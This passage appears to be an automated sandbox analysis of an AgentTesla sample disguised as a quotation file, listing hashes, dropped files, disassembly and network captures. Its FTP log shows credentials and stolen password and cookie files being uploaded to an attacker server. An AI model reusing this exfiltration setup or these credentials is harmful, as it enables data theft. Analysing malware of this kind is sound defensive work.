                                      Amplex_August report.xlsbGet hashmaliciousBrowse
                                      • 209.205.218.178
                                      Amplex_August report.xlsbGet hashmaliciousBrowse
                                      • 209.205.218.178
                                      Prc8TlV0jj.exeGet hashmaliciousBrowse
                                      • 209.205.218.178
                                      Prc8TlV0jj.exeGet hashmaliciousBrowse
                                      • 209.205.218.178
                                      MACHINE QUOTATION.exeGet hashmaliciousBrowse
                                      • 67.220.183.18
                                      O1qCIp2iQSGet hashmaliciousBrowse
                                      • 209.205.235.99
                                      MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                      • 67.220.183.18

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\cdumvf73e27ykoiratb
                                      Process:C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):292863
                                      Entropy (8bit):7.9229750872912295
                                      Encrypted:false
                                      SSDEEP:6144:XEwcisJOHPV1yEvYmD6rWlwvtIa3SB0HzSPEotwOXNFlC0:UDis4v3PY5bvtV68SPEoiyPx
                                      MD5:6FC877D9CB3CBC4295FA7DC49E122056
                                      SHA1:6E9A0AAAD8DB4BC0B91730CDE935242D53355F87
                                      SHA-256:F9EC9E039DCCA4BC15106EDE96D0901AE68AF866A89C33AFCD61F6B2B6F3A2A0
                                      SHA-512:AAC3B2F35F82674B5357857656535145FB6CA929A2DDBA2B8CD65473A87B98CBFDA7F7C56084DE286A41111EBD80883EDABA992AEFC2D586723234B66155413A
                                      Malicious:false
                                      Reputation:low
                                      Preview: >.8s.......%.n-..P1a..9...y..T.1.r...>qD.j..d..v9..?......A.C.w..WU.......j'....V.*..q........}.[8...u......G.TD7..{N...Z...V._.md(.E/.o....A.n1.......[.|.X;.........E....]W....^....6......xe..!U.D.....@..w`-...v.9P...^..f.'/V.g.....7..{N..o s6.."..vy.-._.r1a......I..bW.cr...>q#[j..d..69....+..w...FCh.wN........I(..yr..%...!uN..`.EM.V.2..+. ho.64S*..g.7..N..o s6.....GBn-I<.PZ.S.....y..T.1.r...>qD.j..d......?....w...F+h.ww..#.%....I..y...%.i:!u...`5EM.........ho.6.S*..g.7..{N..Y.x........n-I^.P1.......y..T.1.r....D7.=k.d.6.9....N..w...F+h.ww..#.%....iX+92...%h.:!u..`.EM..k......ho.6.S....E?..I..&o s64).......-I.P1a......X..4.x.>...>..[j...............w...F+h..w..#.%....I..Kyr..%.i:!u...`.EM.V.......ho.6.S*..g.7..{N..o s6......Bn-I.P1a......y..T.1.r...>qD.j..d..v9..?....w...F+h.ww..#.%....I..Kyr..%.i:!u...`.EM.V.......ho.6.S*..g.7..{N..o s6......Bn-I.P1a......y..T.1.r...>qD.j..d..v9..?....w...F+h.ww..#.%....I..Kyr..%.i:!u...`.EM.V..
                                      C:\Users\user\AppData\Local\Temp\nsxC806.tmp\eluwnahujm.dll
                                      Process:C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe
                                      File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):24064
                                      Entropy (8bit):6.382915601460158
                                      Encrypted:false
                                      SSDEEP:384:X9rePw0xDTBSVzQ7+L+RQjnZePwjA4sCCqb99ejALuxZQJg80+54/NM2g:swYBSZn+RAnooxCqK5vAW/NM
                                      MD5:A4D8F681C3E11B358C8A4CEAA7F6A796
                                      SHA1:DBCED7E47A095D1F423073E63860903D859440ED
                                      SHA-256:B1F2B5522B0B8DEB1E7C13218399FD40ED1D9F8447772246776CC78F49D9D6D0
                                      SHA-512:D81430388C2198A18B2E46A11F0737590192482D4163B96FCD9F297FE90984715A7B6ECFAAEB4B80399C7D0E6EBCDEDC992884E5A3C79CEDBF4A1F3B4A32DED2
                                      Malicious:false
                                      Reputation:low
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0..0..0..D/..0../,..0..[..0..0..0...E..0...E..0...E..0...E..0..Rich.0..................PE..L...*.ga...........!.....2...(...............P......................................v.....@..........................U..L....V......................................pU...............................................P...............................text..._0.......2.................. ..`.rdata.......P.......6..............@..@.data........`.......D..............@....rsrc................Z..............@..B.reloc...............\..............@..B................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Roaming\uop1cr4a.d5x\Chrome\Default\Cookies
                                      Process:C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):0.6970840431455908
                                      Encrypted:false
                                      SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                      MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                      SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                      SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                      SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):6.7265834258693
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:QUOTATION OF EQUIPMENT.exe
                                      File size:431519
                                      MD5:6f058c62ace41a97a12e6e7a47c9c76e
                                      SHA1:9c5e94ba757e2387a510bc10559136cb308ce535
                                      SHA256:713bcae8bce87e51a3b3f1448d816dce365302918c476d4bbe964b4834db3ccf
                                      SHA512:8f6b0a05af56bd2cde11fbbfbbc9cf1a3f379c4edbc9fc5adcf260497d926daf6d9df34e929d56cdf41d1d72c6d410f1f0bbeb6bddd758c888f546f221c53563
                                      SSDEEP:6144:VBlL//a6yQE0BouyZ6hjVTsvbaT+rNOfInSZc99YmunnxGK2f+myN:DpzFE0BojZspsvbaTaxEnnxGNGmyN
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                      File Icon

                                      Icon Hash:07d8d8d4d4d85026

                                      Static PE Info

                                      General

                                      Entrypoint:0x4030fb
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:b76363e9cb88bf9390860da8e50999d2

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 00000184h
                                      push ebx
                                      push ebp
                                      push esi
                                      push edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+20h], ebx
                                      mov dword ptr [esp+14h], 00409168h
                                      mov dword ptr [esp+1Ch], ebx
                                      mov byte ptr [esp+18h], 00000020h
                                      call dword ptr [004070B0h]
                                      call dword ptr [004070ACh]
                                      cmp ax, 00000006h
                                      je 00007FBF947D89C3h
                                      push ebx
                                      call 00007FBF947DB7A4h
                                      cmp eax, ebx
                                      je 00007FBF947D89B9h
                                      push 00000C00h
                                      call eax
                                      mov esi, 00407280h
                                      push esi
                                      call 00007FBF947DB720h
                                      push esi
                                      call dword ptr [00407108h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], bl
                                      jne 00007FBF947D899Dh
                                      push 0000000Dh
                                      call 00007FBF947DB778h
                                      push 0000000Bh
                                      call 00007FBF947DB771h
                                      mov dword ptr [00423F44h], eax
                                      call dword ptr [00407038h]
                                      push ebx
                                      call dword ptr [0040726Ch]
                                      mov dword ptr [00423FF8h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+38h]
                                      push 00000160h
                                      push eax
                                      push ebx
                                      push 0041F4F0h
                                      call dword ptr [0040715Ch]
                                      push 0040915Ch
                                      push 00423740h
                                      call 00007FBF947DB3A4h
                                      call dword ptr [0040710Ch]
                                      mov ebp, 0042A000h
                                      push eax
                                      push ebp
                                      call 00007FBF947DB392h
                                      push ebx
                                      call dword ptr [00407144h]

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x28ce0.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x2d0000x28ce00x28e00False0.0487086678135data2.98800227132IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x2d3100x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 4280119364, next used block 4280119364EnglishUnited States
                                      RT_ICON0x3db380x94a8dataEnglishUnited States
                                      RT_ICON0x46fe00x5488dataEnglishUnited States
                                      RT_ICON0x4c4680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                      RT_ICON0x506900x25a8dataEnglishUnited States
                                      RT_ICON0x52c380x10a8dataEnglishUnited States
                                      RT_ICON0x53ce00xc35PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                      RT_ICON0x549180x988dataEnglishUnited States
                                      RT_ICON0x552a00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                      RT_DIALOG0x557080x100dataEnglishUnited States
                                      RT_DIALOG0x558080x11cdataEnglishUnited States
                                      RT_DIALOG0x559280x60dataEnglishUnited States
                                      RT_GROUP_ICON0x559880x84dataEnglishUnited States
                                      RT_MANIFEST0x55a100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                      Imports

                                      DLLImport
                                      KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                      USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                      ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      10/14/21-09:49:06.267352TCP2029927ET TROJAN AgentTesla Exfil via FTP4983221192.168.2.3192.119.9.178
                                      10/14/21-09:49:06.375896TCP2029928ET TROJAN AgentTesla HTML System Info Report Exfil via FTP4983355115192.168.2.3192.119.9.178

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 14, 2021 09:49:04.353971958 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:04.457032919 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:04.457143068 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:04.560816050 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:04.562362909 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:04.665406942 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:04.665466070 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:04.665832043 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:04.808976889 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:05.743321896 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:05.743886948 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:05.847047091 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:05.847223997 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:05.847726107 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:05.950823069 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:05.951319933 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.054415941 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:06.054610968 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.157571077 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:06.163772106 CEST4983355115192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.207684994 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.266549110 CEST5511549833192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:06.266707897 CEST4983355115192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.267352104 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.371301889 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:06.375895977 CEST4983355115192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.377305984 CEST4983355115192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.426527977 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.478780031 CEST5511549833192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:06.480137110 CEST5511549833192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:06.480415106 CEST4983355115192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:06.481111050 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:06.535871029 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:07.662056923 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:07.765427113 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:07.767875910 CEST4983454663192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:07.817193031 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:07.870418072 CEST5466349834192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:07.870584965 CEST4983454663192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:07.870889902 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:07.974611044 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:07.976751089 CEST4983454663192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:07.976836920 CEST4983454663192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:08.020292044 CEST4983221192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:08.079562902 CEST5466349834192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:08.079592943 CEST5466349834192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:08.079730988 CEST4983454663192.168.2.3192.119.9.178
                                      Oct 14, 2021 09:49:08.079801083 CEST2149832192.119.9.178192.168.2.3
                                      Oct 14, 2021 09:49:08.129703045 CEST4983221192.168.2.3192.119.9.178

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 14, 2021 09:49:04.137718916 CEST6035253192.168.2.38.8.8.8
                                      Oct 14, 2021 09:49:04.247364998 CEST53603528.8.8.8192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Oct 14, 2021 09:49:04.137718916 CEST192.168.2.38.8.8.80xb6e7Standard query (0)ftp.omindexgroup.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Oct 14, 2021 09:49:04.247364998 CEST8.8.8.8192.168.2.30xb6e7No error (0)ftp.omindexgroup.com192.119.9.178A (IP address)IN (0x0001)

                                      FTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Oct 14, 2021 09:49:04.560816050 CEST2149832192.119.9.178192.168.2.3220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 08:49. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 08:49. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 08:49. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 08:49. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Oct 14, 2021 09:49:04.562362909 CEST4983221192.168.2.3192.119.9.178USER info@omindexgroup.com
                                      Oct 14, 2021 09:49:04.665466070 CEST2149832192.119.9.178192.168.2.3331 User info@omindexgroup.com OK. Password required
                                      Oct 14, 2021 09:49:04.665832043 CEST4983221192.168.2.3192.119.9.178PASS tlW}sP3mS7Z3
                                      Oct 14, 2021 09:49:05.743321896 CEST2149832192.119.9.178192.168.2.3230 OK. Current restricted directory is /
                                      Oct 14, 2021 09:49:05.847223997 CEST2149832192.119.9.178192.168.2.3504 Unknown command
                                      Oct 14, 2021 09:49:05.847726107 CEST4983221192.168.2.3192.119.9.178PWD
                                      Oct 14, 2021 09:49:05.950823069 CEST2149832192.119.9.178192.168.2.3257 "/" is your current location
                                      Oct 14, 2021 09:49:05.951319933 CEST4983221192.168.2.3192.119.9.178TYPE I
                                      Oct 14, 2021 09:49:06.054415941 CEST2149832192.119.9.178192.168.2.3200 TYPE is now 8-bit binary
                                      Oct 14, 2021 09:49:06.054610968 CEST4983221192.168.2.3192.119.9.178PASV
                                      Oct 14, 2021 09:49:06.157571077 CEST2149832192.119.9.178192.168.2.3227 Entering Passive Mode (192,119,9,178,215,75)
                                      Oct 14, 2021 09:49:06.267352104 CEST4983221192.168.2.3192.119.9.178STOR PW_user-585948_2021_10_14_12_47_01.html
                                      Oct 14, 2021 09:49:06.371301889 CEST2149832192.119.9.178192.168.2.3150 Accepted data connection
                                      Oct 14, 2021 09:49:06.481111050 CEST2149832192.119.9.178192.168.2.3226-File successfully transferred
                                      226-File successfully transferred226 0.109 seconds (measured here), 3.94 Kbytes per second
                                      Oct 14, 2021 09:49:07.662056923 CEST4983221192.168.2.3192.119.9.178PASV
                                      Oct 14, 2021 09:49:07.765427113 CEST2149832192.119.9.178192.168.2.3227 Entering Passive Mode (192,119,9,178,213,135)
                                      Oct 14, 2021 09:49:07.870889902 CEST4983221192.168.2.3192.119.9.178STOR CO_user-585948_2021_10_14_12_47_21.zip
                                      Oct 14, 2021 09:49:07.974611044 CEST2149832192.119.9.178192.168.2.3150 Accepted data connection
                                      Oct 14, 2021 09:49:08.079801083 CEST2149832192.119.9.178192.168.2.3226-File successfully transferred
                                      226-File successfully transferred226 0.105 seconds (measured here), 12.21 Kbytes per second

                                      Code Manipulations

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:09:47:19
                                      Start date:14/10/2021
                                      Path:C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe'
                                      Imagebase:0x400000
                                      File size:431519 bytes
                                      MD5 hash:6F058C62ACE41A97A12E6E7A47C9C76E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.307528948.0000000002440000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.307528948.0000000002440000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:09:47:20
                                      Start date:14/10/2021
                                      Path:C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\QUOTATION OF EQUIPMENT.exe'
                                      Imagebase:0x400000
                                      File size:431519 bytes
                                      MD5 hash:6F058C62ACE41A97A12E6E7A47C9C76E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.567930918.0000000003331000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.567930918.0000000003331000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.566777680.00000000022E0000.00000004.00020000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.566777680.00000000022E0000.00000004.00020000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.566863487.0000000002331000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.568210008.0000000004812000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.568210008.0000000004812000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.566108651.000000000078B000.00000004.00000020.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.566108651.000000000078B000.00000004.00000020.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.565262027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.565262027.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Disassembly

                                      Code Analysis

                                      Reset < >